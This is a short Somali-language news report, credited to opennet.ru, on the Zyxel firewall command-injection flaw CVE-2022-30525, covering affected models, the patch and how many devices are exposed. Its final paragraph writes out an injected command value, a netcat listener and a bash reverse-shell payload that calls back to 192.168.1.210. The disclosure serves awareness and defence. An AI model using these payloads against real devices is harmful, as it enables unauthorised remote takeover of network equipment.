Nuglaanta ku jirta dab-damiska Zyxel ee u oggolaanaya fulinta koodka iyada oo aan la hubin

Nuglaanta halista ah (CVE-2022-30525) ayaa lagu aqoonsaday aaladaha Zyxel ee taxanaha ATP, VPN iyo USG FLEX, oo loogu talagalay in lagu abaabulo hawlgalka dab-damiska, IDS iyo VPN ee shirkadaha, taas oo u oggolaanaysa weeraryahan dibadda ah inuu fuliyo koodka qalab aan lahayn xuquuqda isticmaalaha iyada oo aan la xaqiijin. Si loo qaado weerar, weeraryahanku waa inuu awood u leeyahay inuu codsiyada u soo diro aaladda isagoo isticmaalaya borotokoolka HTTP/HTTPS. Zyxel wuxuu hagaajiyay nuglaanta ee ZLD 5.30 cusboonaysiinta firmware. Marka loo eego adeegga Shodan, waxaa hadda jira 16213 aaladaha nugul ee shabakadda caalamiga ah kuwaas oo aqbala codsiyada HTTP/HTTPS.

Hawlgalka waxaa lagu fuliyaa iyadoo loo dirayo amarro si gaar ah loo qaabeeyey maamulaha webka /ztp/cgi-bin/handler, la heli karo iyada oo aan la aqoonsanayn. Dhibaatada waxaa sababa la'aanta nadiifinta saxda ah ee cabbiraadaha codsiga marka la fulinayo amarrada nidaamka iyadoo la adeegsanayo os.system call ee loo isticmaalo maktabadda lib_wan_settings.py oo la fuliyo marka la farsameynayo hawlgalka setWanPortSt.

Tusaale ahaan, weeraryahanku wuxuu dhaafi karaa xadhigga "; ping 192.168.1.210; taas oo horseedi doonta fulinta amarka "ping 192.168.1.210" ee nidaamka. Si aad u gasho qolofka amarka, waxaad ku socodsiin kartaa β€œnc -lvnp 1270” nidaamkaaga, ka dibna waxaad bilaabi kartaa xiriir gadaal ah adigoo codsi u diraya aaladda '; bash -c \"exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\";'.

Source: opennet.ru

Add a comment